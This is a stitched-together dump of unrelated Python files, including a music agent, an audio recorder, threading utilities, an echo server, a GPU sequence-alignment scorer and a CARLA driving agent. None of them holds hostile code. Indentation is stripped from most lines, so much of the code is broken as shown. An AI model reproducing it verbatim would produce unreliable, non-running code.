def create_command(self, target, command_pack, dummy_logger_prints=False):
"""
Create a command that will execute jobs one by one.
:param target: function
:param command_pack: dict
:param dummy_logger_prints: bool
:return: Command
"""
if type(command_pack) != dict:
raise TypeError('Expected a dictionary for the command_pack variable.')
self.logger.info('Creating command.')
try:
items = command_pack.iteritems()
except AttributeError:
items = command_pack.items()
for key, args in items:
args = (self.controllers[key],) + args
thread = DummyThread(target=target, args=args)
self.pool.append(thread)
pool, self.pool = self.pool, []
return Command(self.logging_val, pool, log_file=self.log_file, dummy_logger_prints=dummy_logger_prints)
class Command(object):
def __init__(self, logging, pool, dummy_logger_prints=False, log_file='command_log.txt'):
self.log_file = log_file
if logging:
            # Set up the logger (use the module alias; `logging` here is the boolean flag). #
            logging_module.basicConfig(level=logging_module.DEBUG)
            logger = logging_module.getLogger(Command.__name__)
            # Create log handler for writing to file. #
            handler = logging_module.FileHandler(self.log_file)
            handler.setLevel(logging_module.DEBUG)
            # Create a logging format. #
            formatter = logging_module.Formatter(
                '%(asctime)s - %(name)s.%(levelname)s: %(message)s',
                datefmt='%m-%d-%Y %H:%M:%S'
            )
handler.setFormatter(formatter)
# Add the handlers to the logger.
logger.addHandler(handler)
self.logger = logger
else:
self.logger = DummyLogger(prints=dummy_logger_prints, level='DEBUG')
self.pool = pool
def start(self, dump_pool=True, join_threads=True):
"""
Start the threads in the thread pool.
:param dump_pool: bool
:param join_threads: bool
:return: self
"""
self.logger.info('Starting command.')
for thread in self.pool:
thread.start()
if join_threads:
for i, thread in enumerate(self.pool):
thread.join()
self.logger.debug('Thread #{} joined: {}'.format(i, thread))
if dump_pool:
self.logger.debug('Dumping pool.')
self.dump_pool()
return self
def dump_pool(self):
"""
Remove the threads from the thread pool.
:return: self
"""
self.pool = []
self.logger.info('Threads dumped, 0 threads in pool.')
return self
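# Illustrative usage sketch (not part of the original module; `SearchController` and its
# `search` method are hypothetical stand-ins for your own controller objects):
#
# controllers = {'google': SearchController('google'), 'bing': SearchController('bing')}
# factory = ThreadedCommandFactory(controllers, logging=False, attach_drivers=False)
#
# def do_search(controller, term):
#     return controller.search(term)
#
# cmd = factory.create_command(do_search, {'google': ('selenium',), 'bing': ('selenium',)})
# cmd.start()         # one thread per controller, joined before returning
# factory.shutdown()  # close any attached WebDriver instances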
|
music.py
|
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import pafy
from time import sleep
from threading import Thread
from urllib.parse import *
import urllib.request
import vlc
from topics.topic import TopicAgent
from utils.logging.console_logger import ConsoleLogger
NAME = "music"
COMPARISON_COMMANDS = [
"Play bad touch from blodhound gang.",
"Play nothing else matters.",
"Play the piano man by billy joel.",
"Stop playing music.",
"Raise the volume.",
"Lower the volume.",
"Stop music.",
"Resume music."
]
class MusicAgent(TopicAgent):
def __init__(self, messenger):
super(MusicAgent, self).__init__(
messenger=messenger,
name=NAME,
comparison_commands=COMPARISON_COMMANDS)
self._logger = ConsoleLogger()
self._player = None
self._messenger.register_callback(self.process)
def _get_url(self, title):
# based on https://github.com/dashvinsingh/YoutubeAudio-Python-Stream/blob/master/youtube_stream.py
query = urllib.parse.quote(title)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib.request.urlopen(url)
sleep(1)
html = response.read()
try:
soup = BeautifulSoup(html, 'lxml')
video_urls = soup.findAll(attrs={'class': 'yt-uix-tile-link'})
video_url = 'https://www.youtube.com' + video_urls[0]['href']
except IndexError:
return self._get_url(title)
video = pafy.new(video_url)
best = video.getbestaudio()
playurl = best.url
return playurl
def _play_audio_from_url(self, url):
Instance = vlc.Instance()
self._player = Instance.media_player_new()
Media = Instance.media_new(url)
Media.get_mrl()
self._player.set_media(Media)
self._player.play()
while self._player and not self._player.is_playing():
sleep(0.2)
while self._player is not None and self._player.is_playing():
sleep(1)
def _play_audio(self, title):
self._logger.info('play entered')
if self._player and self._player.is_playing():
self._stop_audio()
url = self._get_url(title)
playing_thread = Thread(target=self._play_audio_from_url, args=[url])
playing_thread.start()
def _pause_audio(self):
print('pause entered')
if self._player is not None:
self._player.pause()
def _stop_audio(self):
self._logger.info('stop entered')
if self._player is not None:
self._player.stop()
self._player = None
def _resume_audio(self):
self._logger.info('resume entered')
if self._player is not None:
self._player.pause()
def _raise_volume(self):
self._logger.info('raise volume entered')
if self._player is not None:
volume = self._player.audio_get_volume()
            raised_volume = min(volume + 10, 100)  # cap the volume at 100
            self._player.audio_set_volume(raised_volume)
def _lower_volume(self):
self._logger.info('lower volume entered')
if self._player is not None:
volume = self._player.audio_get_volume()
            lowered_volume = max(volume - 10, 0)  # do not go below 0
            self._player.audio_set_volume(lowered_volume)
def process(self, command):
if 'play' in command:
# TODO: Use more elaborate nlp
title = command.split("play")[-1]
self._play_audio(title)
elif 'pause' in command:
self._pause_audio()
elif 'resume' in command:
self._resume_audio()
elif 'stop' in command:
self._stop_audio()
elif 'raise' in command:
self._raise_volume()
elif 'lower' in command:
            self._lower_volume()
return ''
def run(self):
self._messenger.start_listening()
def stop(self):
self._messenger.stop_listening()
# ma = MusicAgent()
# ma.process('play bad touch')
# sleep(5)
# ma.process('pause music')
# sleep(5)
# ma.process('resume music')
# sleep(5)
# ma.process('louder!!!')
# sleep(5)
# ma.process('stop music playback.')
# sleep(3)
# ma.process('play californication by rhcp')
|
initiate.py
|
from tkinter import Tk , Label , Button , PhotoImage;
from tkinter.ttk import Progressbar;
from tkinter.filedialog import asksaveasfile
from threading import Thread;
from os import remove , fdopen;
from sys import getsizeof;
from tempfile import mkstemp;
from time import time , sleep , strftime , gmtime;
import wave;
import pyaudio;
import audioop;
import numpy as np;
class MainWin(Tk) :
def __init__(self,title) :
Tk.__init__(self);
self.title(title);
self.resizable(False,False);
self.geometry("500x50")
self.columnconfigure(1,weight=1);
self.rowconfigure(0,weight=1);
self._part();
self.count= 0;
self.size = 0;
self.stop = False;
self.play = False;
self.starter = True;
def _part(self) :
self.dataSize = Label(self,text="0B".center(10," "))
self.dataSize.grid(row=0,column=0,padx=10,sticky="ew");
self.progressBar = Progressbar(self,mode="determinate")
self.progressBar["maximum"] = 100;
self.progressBar.grid(row=0,column=1,ipady=3,sticky="ew");
self.clockLabel = Label(self,text="00:00:00");
self.clockLabel.grid(row=0,column=2,padx=10,sticky="ew");
self.actionBtn = Button(self,text="jesus",relief="flat",command=self._onAction);
self.actionBtn.grid(row=0,column=3,padx=5);
self.stopBtn = Button(self,text="jesus",relief="flat",state="disabled",command=self._onStop);
self.stopBtn.grid(row=0,column=4,padx=5);
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image);self.stopBtn.img = image;
self.bind("<space>" , lambda x : self._onAction());
def voice(self) :
def callback(inData,frameCount,timeInfo,statues) :
if self.stop :
file = open(self.nameTemp,"rb")
binaries = b''.join(file.readlines())
pathName = self.saveFile();
if pathName != None :
waveFile = wave.open(pathName, 'wb')
waveFile.setnchannels(2)
waveFile.setsampwidth(audio.get_sample_size(pyaudio.paInt16))
waveFile.setframerate(44100)
waveFile.writeframes(binaries)
waveFile.close()
file.close();
self.fileTemp.close();
remove(self.nameTemp);
self.reset()
return (inData,pyaudio.paComplete);
else :
                vis = np.frombuffer(inData,dtype=np.int16); # np.fromstring is deprecated for binary data
peak = np.average(np.abs(vis))*2;
self._updateProgressBar(int(int(peak)*100/2**16));
if self.play :
#print(inData)
self.fileTemp.write(inData);
self.size += getsizeof(inData);
self.dataSize.configure(text=self.formateSize(self.size))
return (inData,pyaudio.paContinue);
else : return (inData,pyaudio.paContinue);
audio = pyaudio.PyAudio();
stream = audio.open(
format=pyaudio.paInt16,
channels=2,
rate=44100,
input=True,
frames_per_buffer=1024,
stream_callback=callback
);
def _changeFlags(self) :
if self.play : file = "img/play.png";self.play=False;
else : file = "img/pause.png";self.play=True;
try :
image = PhotoImage(file=file);
except : pass
else : self.actionBtn.configure(image=image);self.actionBtn.img=image
def _onStop(self) : self.stop = True;
def _updateProgressBar(self,value) : self.progressBar["value"] = value;
def _onAction(self) :
self._changeFlags();
if self.starter :
self.starter = False;
self.handlerTemp , self.nameTemp = mkstemp();
self.fileTemp = fdopen(self.handlerTemp , "wb");
self._updateTime();
self.voice();
self.stopBtn.configure(state="normal")
@staticmethod
def _startNewThread(func) :
thread = Thread(target=func,args=());
thread.setDaemon(True)
thread.start();
@staticmethod
def saveFile() :
f = asksaveasfile(mode='wb', defaultextension=".wav")
if f is None : return
f.close()
return f.name
@staticmethod
def formateSize(num, suffix='B') :
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi'] :
if abs(num) < 1024.0 :
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0;
return ("%.1f%s%s" % (num, 'Yi', suffix));
def reset(self) :
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image,state="disabled");self.stopBtn.img = image;
self.size = 0;
self.count = 0;
self.starter = True;
self.play = False;
self.stop = False;
self.progressBar["value"] = 0;
self.dataSize.configure(text="0B".center(10," "))
self.clockLabel.configure(text="00:00:00");
def _updateTime(self) :
if self.stop : return;
if self.play : self.count += 0.2;self.clockLabel.configure(text=str(strftime("%H:%M:%S", gmtime(self.count))));self.after(200,self._updateTime);
else : self.after(200,self._updateTime);
def run(self) :
self.mainloop();
MainWin("jesus christ").run();
|
threads01.py
|
import threading, time
def mi_thread(miNumero):
while True:
print("thread numero", num)
time.sleep(miNumero)
if __name__ == "__main__":
for num in range(1, 10):
        elThread = threading.Thread(target=mi_thread, args=(num,), daemon=True) # what happens if I remove the comma?
elThread.start()
while True:
pass
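# Note on the question above: args=(num,) must be a tuple; args=(num) is just an int, and
# the thread would fail at start-up because an int cannot be unpacked as an argument list.
# The busy loop `while True: pass` keeps the daemon threads alive but burns a CPU core;
# a sleep-based loop would behave the same while staying idle, e.g.:
#     while True:
#         time.sleep(1)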
|
threads.py
|
#
# CastPodder thread management code
# Copyright (c) 2005-2006 Scott Grayban and the CastPodder Team
#
# $Id: threads.py 147 2006-11-07 08:17:03Z sgrayban $
"""
CastPodder is Copyright © 2005-2006 Scott Grayban
Read the file Software_License_Agreement.txt for more info.
"""
__license__ = "Commercial"
import threading
import logging
import hooks
import sys
COM = False
try:
import pythoncom
COM = True
except ImportError:
pass
log = logging.getLogger('iPodder')
# TODO: add all the COM initialisation stuff
def mklogmethod(level):
"""Make a log method for `SelfLogger`."""
def logmethod(self, *a, **kw):
self.log(level, *a, **kw)
logmethod.__doc__ = "Issue tagged level %d log record." % level
return logmethod
class SelfLogger(object):
"""Mixin class to give objects the ability to log via their own
methods. It's useful for threads wanting to identify themselves
when they log, for example."""
def __init__(self, log=None, tag=None):
"""Initialise the generic thread."""
if log is None:
self.__log = logging.getLogger('iPodder')
else:
self.__log = log
classname = self.__class__.__name__
if tag is None:
self.__tag = "%s %d" % (classname, id(self))
else:
self.__tag = "%s %d %s" % (classname, id(self), repr(tag))
def log(self, level, msg, *args, **kwargs):
"""Issue a tagged log entry via our logger."""
msg = "%s reports: " + msg
args = list(args) # take a copy
args.insert(0, self.__tag)
self.__log.log(level, msg, *args, **kwargs)
# Construct logging methods at various levels
fatal = mklogmethod(logging.CRITICAL)
critical = mklogmethod(logging.CRITICAL)
error = mklogmethod(logging.ERROR)
warning = mklogmethod(logging.WARNING)
warn = warning
info = mklogmethod(logging.INFO)
debug = mklogmethod(logging.DEBUG)
spam = mklogmethod(int(logging.DEBUG/2)) # heh
def exception(self, msg, *args, **kwargs):
kwargs['exc_info'] = 1
self.error(msg, *args, **kwargs)
class OurThread(threading.Thread, SelfLogger):
"""Generic thread."""
def __init__(self, log=None, target=None, *a, **kw):
"""Initialise the generic thread."""
self.hooks = hooks.HookCollection()
self.exc_info = None
self.target = target
# if we have a name, steal it
self.name = kw.get('name')
# Initialise our parents
SelfLogger.__init__(self, log=log, tag=self.name)
threading.Thread.__init__(self, *a, **kw)
def run(self):
"""Run .our_run(), catching exceptions."""
target = self.target
if target is None:
target = self.our_run
try:
if COM:
pythoncom.CoInitialize()
try:
target()
except:
self.exc_info = sys.exc_info()
self.exception("Uncaught exception.")
raise # just in case threading.Thread catches it in some
# standard way in a later version of Python
finally:
if COM:
pythoncom.CoUninitialize()
def catch(self):
"""Check for exceptions and re-raise them in the calling thread."""
if self.exc_info is not None:
one, two, three = self.exc_info
raise one, two, three
if __name__ == '__main__':
logging.basicConfig()
log.setLevel(logging.DEBUG)
sl = SelfLogger(log=log, tag="soon to die")
sl.fatal("I can see the fnords!")
def boom():
raise AssertionError, "KABOOM!"
ot = OurThread(target=boom)
ot.fatal("Boo?")
ot.start()
ot.join()
ot.catch()
|
handler.py
|
"""
This module contains the ControlHandler class.
Created on Jan 21, 2016
@author: Nicklas Boerjesson
"""
import threading
from of.common.logging import write_to_log, EC_SERVICE, SEV_ERROR
from of.common.messaging.factory import reply_with_error_message
from of.common.queue.handler import Handler
__author__ = 'Nicklas Börjesson'
class ControlHandler(Handler):
"""
    The ControlHandler is responsible for executing the agent-level commands, such as stopping, starting and supervising
the monitors of the system.
"""
#: A map between schema Ids and handlers
schema_id__handler = None
#: The base folder for all repositories
repository_base_folder = None
#: The process monitor, responsible for communication with the worker processes
worker_monitor = None
#: The message monitor responsible for communication with entities outside of the agent
message_monitor = None
# A callback to the stop agent function
stop_agent = None
def __init__(self, _process_id, _worker_monitor, _message_monitor, _stop_agent):
"""
Initialize control handler
        :param _process_id: The current process Id
:param _worker_monitor: A worker monitor instance
:param _message_monitor: The monitor for in- and outgoing message for the client
:param _stop_agent: A callback function that stops the entire agent process
"""
super(ControlHandler, self).__init__(_process_id)
self.schema_id__handler = {"ref://bpm.message,agent.control": self.handle_agent_control_message}
self.worker_monitor = _worker_monitor
self.message_monitor = _message_monitor
self.stop_agent = _stop_agent
def on_monitor_init(self, _monitor):
"""
        When the monitor initializes, it calls this callback, which registers the monitor's queue with the message
        handler.
:param _monitor: The monitor instance
:return:
"""
self.message_monitor.handler.control_queue = _monitor.queue
def handle_error(self, _error_message, _message):
"""
        A generic function for handling errors
        :param _error_message: The error message
        :param _message: The message that triggered the error
        """
        write_to_log("An error occurred, replying with an error message. Error: " + str(_error_message),
_category=EC_SERVICE, _severity=SEV_ERROR)
self.message_monitor.queue.put([None,
reply_with_error_message(self, _message, _error_message)])
def handle_agent_control_message(self, _message_data):
"""
        This method executes the commands carried in agent-level control messages
:param _message_data: The command message
:return:
"""
def _command_local(_command):
self.write_dbg_info(self.log_prefix + "Told by user " + _message_data["userId"] +
" to " + _command + ", reason: " + _message_data["reason"])
# Call the agent stop_agent()-callback
if _command == "stop":
self.stop_agent(_reason=_message_data["reason"], _restart=False)
elif _command == "restart":
self.stop_agent(_reason=_message_data["reason"], _restart=True)
# Run commands in a separate thread
_control_thread = threading.Thread(target=_command_local, args=[_message_data["command"]])
_control_thread.start()
def handle(self, _message_data):
"""
This is the generic message handler for the control handler
:param _message_data: The message data
"""
self.write_dbg_info("Handling message : " + str(_message_data))
try:
_schema_id = _message_data["schemaRef"]
except KeyError:
self.handle_error("No schema id found in message.", _message_data)
return
try:
_handler = self.schema_id__handler[_schema_id]
except KeyError:
self.handle_error("No handler found for schema Id " + str(_schema_id), _message_data)
return
try:
_handler(_message_data)
except Exception as e:
self.handle_error("Error running handler for " + str(_schema_id) + ": " + str(e), _message_data)
def shut_down(self, _user_id):
"""
Shut down the handler, also shuts down the worker and message monitors
:param _user_id: The user_id that initiated the shut down
:return:
"""
super(ControlHandler, self).shut_down(_user_id)
        # Stop the workers (in reverse order) before the messaging handlers
        # (or else they can't communicate their states to the broker)
self.worker_monitor.stop(_reverse_order=True)
# stop messaging
self.message_monitor.stop()
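# Illustrative sketch (not part of the original module): the shape of a message that
# handle() would route to handle_agent_control_message(). The instance name and field
# values are examples only.
#
# _message_data = {
#     "schemaRef": "ref://bpm.message,agent.control",
#     "command": "restart",  # or "stop"
#     "userId": "tester",
#     "reason": "rolling out a new configuration"
# }
# control_handler.handle(_message_data)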
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import sys
import time
from multiprocessing import Process
#define address & buffer size
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
#get host information
def get_remote_ip(host):
print(f'Getting IP for {host}')
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
print ('Hostname could not be resolved. Exiting')
sys.exit()
print (f'Ip address of {host} is {remote_ip}')
return remote_ip
def handle_echo(addr, conn):
print("Connected by", addr)
    #receive data, wait a bit, then send it back
full_data = conn.recv(BUFFER_SIZE)
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind socket to address
s.bind((HOST, PORT))
#set to listening mode
s.listen(2)
#continuously listen for connections
while True:
conn, addr = s.accept()
print("Connected by", addr)
p = Process(target=handle_echo,args=(addr,conn))
p.daemon = True
p.start()
print("Started process", p)
if __name__ == "__main__":
main()
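# Quick manual check (illustrative only; run from a separate shell while the server is up):
#
#   import socket
#   with socket.create_connection(("localhost", 8001)) as c:
#       c.sendall(b"hello")
#       print(c.recv(1024))   # -> b"hello" after roughly half a second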
|
hgbrian_GPU_NW.py
|
# Approach: for each sequence, call a function modifying hgbrian's NW code
# to get the score.
import numba
from numba import cuda, float32
import numpy as np
# for testing
import nw_align_mod
import time
import sys
import copy
from multiprocessing import Process, Pipe
A_SMALL_FLOAT = -100000.
# Constant matrices for DNA-to-integer conversion
NTLIST = ["","A","C","G","T","N","-"]
NTDICT = dict((j,i) for i,j in enumerate(NTLIST))
N_VAL = ord('N')
# For reference: it looks like Python, but it ain't.
# https://docs.anaconda.com/numbapro/CUDAPySpec
# Written as a formattable string, not just code, because cuda.local.array requires the size to be specified with raw constants.
# And why not pass in the other parameters that way while I'm at it?
KERNEL_STR = """@cuda.jit
def hgbrian_score_kernel(seq_arr, len_arr, out_arr):
max_gaps = {max_gaps}
gap= {gap} #-1
match= {match} #1
mismatch= {mismatch} #0
eps = 1e-8
pos = cuda.threadIdx.x + cuda.blockIdx.x * cuda.blockDim.x
if pos < seq_arr.size - 1: # Check array boundaries
max_i = len_arr[pos]
max_j = len_arr[pos+1]
# Break immediately if alignment impossible
if abs(max_i - max_j) > max_gaps:
out_arr[pos] = A_SMALL_FLOAT
else:
# ensure seq_i is the longer of the two
if max_j > max_i:
t = max_i
max_i = max_j
max_j = t
seqi = seq_arr[pos+1,...][:max_i]
seqj = seq_arr[pos,...][:max_j]
else:
seqi = seq_arr[pos,...][:max_i]
seqj = seq_arr[pos+1,...][:max_j]
last_score = cuda.local.array({local_size}, dtype=float32) # 2*max_gaps + 1 # could be made faster using shared memory, but I don't think the kernel is the bottleneck
score = cuda.local.array({local_size}, dtype=float32) # 2*max_gaps + 1
for q in range(len(last_score)):
score[q] = abs(q-max_gaps)*gap
for i in range(0, max_i):
ci = seqi[i]
for p in range(len(last_score)):
last_score[p] = score[p]
for q in range(len(score)):
# Ignore the spaces in the grid that require more than max_gaps indels
j = i - max_gaps + q
if j < 0 or j >= max_j:
score[q] = A_SMALL_FLOAT
else:
cj = seqj[j]
_matchscore = match if ci == cj and ci != {N} else mismatch # {N} is the 'N' character, which matches nothing
dg_score = last_score[q] + _matchscore
if q != len(score) - 1:
up_score = last_score[q+1] + gap
else:
up_score = A_SMALL_FLOAT
if q != 0:
lf_score = score[q-1] + gap
else:
lf_score = A_SMALL_FLOAT
if dg_score >= up_score-eps and dg_score >= lf_score-eps:
score[q] = dg_score
elif lf_score >= dg_score-eps and lf_score >= up_score-eps:
score[q] = lf_score
else:
score[q] = up_score
# Find which position in 'score' corresponds to the final alignment ([max_i, max_j] in the original explicit matrix)
ans = score[max_j - max_i + max_gaps]
out_arr[pos] = ans"""
def _convert_dna_to_array(dnastr, max_len):
ans = np.zeros(max_len)
for i in range(len(dnastr)):
ans[i] = NTDICT[dnastr[i]]
return(ans)
def seq_to_list(seq, max_len):
seq = [ord(q) for q in seq]
seq.extend([0]*(max_len - len(seq)))
return(seq)
def seqs_to_arrays(seqs, max_len, conn):
seq_arr = [seq_to_list(q,max_len) for q in seqs]
seq_arr = np.array(seq_arr)
conn.send(seq_arr)
conn.close()
# Ugly, but seems to work. Manually spawn three processes, and split the work up among them.
def seqs_to_arrays_triplicate_wrapper(chunk, max_len):
    split_pos = len(chunk) // 3  # integer division so the slice indices stay ints
lines_1 = copy.copy(chunk[:split_pos])
lines_2 = copy.copy(chunk[split_pos:2*split_pos])
lines_3 = copy.copy(chunk[2*split_pos:])
parent_1, child_1 = Pipe()
p1 = Process(target = seqs_to_arrays, args = (lines_1, max_len, child_1))
p1.start()
parent_2, child_2 = Pipe()
p2 = Process(target = seqs_to_arrays, args = (lines_2, max_len, child_2))
p2.start()
parent_3, child_3 = Pipe()
p3 = Process(target = seqs_to_arrays, args = (lines_3, max_len, child_3))
p3.start()
array_1 = parent_1.recv()
array_2 = parent_2.recv()
array_3 = parent_3.recv()
p1.join()
p2.join()
p3.join()
arrs_out = []
for q in [array_1, array_2, array_3]:
if q.shape[0] > 0:
arrs_out.append(q)
arrs_out = np.concatenate(arrs_out, axis = 0)
return(arrs_out)
# Read lines from file_in; write scores to file_out
# Approach: iteratively read lines from file_in; pass them as conveniently-sized blocks
# to the device and invoke the kernel to align them.
# Written for clarity, not perfect I/O efficiency - CPU-bound preprocessing is bottleneck for me.
def score_file(file_in, file_out, max_gaps, chunk_size, threads_per_block, gap = -5, match = 1, mismatch = 0):
local_size = 2*max_gaps + 1
ks_formatted = KERNEL_STR.format(max_gaps = str(max_gaps), local_size = str(local_size), gap = gap, match = match, mismatch = mismatch, N = str(N_VAL))
    exec(ks_formatted, globals())  # define in globals() so the generated kernel name is visible below (needed on Python 3)
chunk = []
lens = []
max_len = 0
stream = cuda.stream() # not really necessary in this setup, but keeping in case I want to adapt this code
with open(file_in) as fi, open(file_out, 'w') as fo:
keep_reading = True
while(keep_reading):
# fill the next chunk
while(len(chunk) < chunk_size):
try:
                    l = next(fi).split(',')[0]
chunk.append(l)
lens.append(len(l))
if max_len < len(l):
max_len = len(l)
except StopIteration:
keep_reading = False
break
if len(chunk) <= 1: # need at least 2 seqs for a comparison
break
# convert the chunk to arrays
scores_local = np.zeros(shape = len(chunk) - 1, dtype = 'float')
seqs_arr_local = seqs_to_arrays_triplicate_wrapper(chunk, max_len)
len_arr_local = np.array(lens)
# send the arrays to the device
stream.synchronize()
seqs_arr_shared = np.copy(seqs_arr_local)
len_arr_shared = np.copy(len_arr_local)
scores_shared = np.copy(scores_local)
seqs_arr_shared, len_arr_shared, scores_shared = cuda.to_device(seqs_arr_shared, stream = stream), cuda.to_device(len_arr_shared, stream = stream), cuda.to_device(scores_shared, stream = stream)
blockspergrid = (seqs_arr_shared.shape[0] + (threads_per_block - 1)) // threads_per_block
hgbrian_score_kernel[blockspergrid, threads_per_block, stream](seqs_arr_shared, len_arr_shared, scores_shared)
stream.synchronize() # <- if the kernel was more time-intensive, we could revise this to do preprocessing while the kernel runs - makes bookkeeping to get the output back nontrivial and bug-prone though.
# Copy the results to host, and write them
scores_local = np.copy(scores_shared.copy_to_host())
for q in range(scores_local.shape[0]):
fo.write("%s\n" % str(scores_local[q]))
write_scores = False
# prepare for the next chunk; start the next chunk with the last sequence in this one, as we don't know the distance to its successor yet.
chunk = [chunk[-1]]
lens = [lens[-1]]
max_len = len(chunk[0])
def test_nw_align_to_score(aln):
score = 0
for (i,j) in zip(aln[0], aln[1]):
if i == '-' or j == '-':
score = score - 1
elif i == j and i != 'N':
score = score + 1
return(score)
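# Worked example (added for clarity): with the +1 match / 0 mismatch / -1 gap
# convention hard-coded in test_nw_align_to_score, the alignment
# ("ACGT", "AC-T") scores +1 +1 -1 +1 = 2.
def _test_score_example():
    assert test_nw_align_to_score(("ACGT", "AC-T")) == 2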
if __name__ == '__main__':
    file_in, file_out, max_gaps, chunk_size = sys.argv[1:5]
    max_gaps, chunk_size = int(max_gaps), int(chunk_size)
    # score_file also requires threads_per_block; 128 is an assumed default
    # chosen here so the call runs, not a value given by the original author.
    score_file(file_in, file_out, max_gaps, chunk_size, threads_per_block=128)
|
HumanAgent.py
|
import cv2
import numpy as np
import time
from threading import Thread
try:
import pygame
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
class HumanInterface():
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self.WIDTH = 800
self.HEIGHT = 600
self.THROTTLE_DELTA = 0.05
self.STEERING_DELTA = 0.01
def run(self):
while not self._parent.agent_engaged and not self.quit:
time.sleep(0.5)
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self.WIDTH, self.HEIGHT), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Human Agent")
controller = KeyboardControl()
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump()
# process sensor data
input_data = self._parent.sensor_interface.get_data()
image_center = input_data['Center'][1][:,:,-2::-1]
image_left = input_data['Left'][1][:,:,-2::-1]
image_right = input_data['Right'][1][:,:,-2::-1]
image_rear = input_data['Rear'][1][:,:,-2::-1]
top_row = np.hstack((image_left, image_center, image_right))
bottom_row = np.hstack((0*image_rear, image_rear, 0*image_rear))
comp_image = np.vstack((top_row, bottom_row))
# resize image
image_rescaled = cv2.resize(comp_image, dsize=(self.WIDTH, self.HEIGHT), interpolation=cv2.INTER_CUBIC)
# display image
self._surface = pygame.surfarray.make_surface(image_rescaled.swapaxes(0, 1))
if self._surface is not None:
self._display.blit(self._surface, (0, 0))
pygame.display.flip()
pygame.quit()
class HumanAgent(AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = Track.ALL_SENSORS_HDMAP_WAYPOINTS
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
:return: a list containing the required sensors in the following format:
[
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor01'],
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor02'],
['sensor.lidar.ray_cast', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll}, 'Sensor03']
]
"""
sensors = [{'type': 'sensor.camera.rgb', 'x':0.7, 'y':0.0, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':0.0,
'width':300, 'height':200, 'fov':100, 'id': 'Center'},
{'type': 'sensor.camera.rgb', 'x':0.7, 'y':-0.4, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': -45.0, 'width': 300, 'height': 200, 'fov': 100, 'id': 'Left'},
{'type': 'sensor.camera.rgb', 'x': 0.7, 'y':0.4, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':45.0,
'width':300, 'height':200, 'fov': 100, 'id': 'Right'},
{'type': 'sensor.camera.rgb', 'x': -1.8, 'y': 0, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': 180.0, 'width': 300, 'height': 200, 'fov': 130, 'id': 'Rear'},
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'}
]
return sensors
def run_step(self, input_data, timestamp):
self.agent_engaged = True
time.sleep(0.1)
return self.current_control
def destroy(self):
self._hic.quit = True
self._thread.join()
class KeyboardControl(object):
def __init__(self):
self._control = carla.VehicleControl()
self._steer_cache = 0.0
def parse_events(self, control, clock):
print('parse_events')
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
control.steer = self._control.steer
control.throttle = self._control.throttle
control.brake = self._control.brake
control.hand_brake = self._control.hand_brake
def _parse_vehicle_keys(self, keys, milliseconds):
self._control.throttle = 0.6 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 15.0 * 5e-4 * milliseconds
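        # Added note: with the 20 Hz tick used in HumanInterface.run (roughly
        # 50 ms per frame), this increment is about 15.0 * 5e-4 * 50 = 0.375
        # per frame before the cache is clamped to [-0.95, 0.95] and rounded.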
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
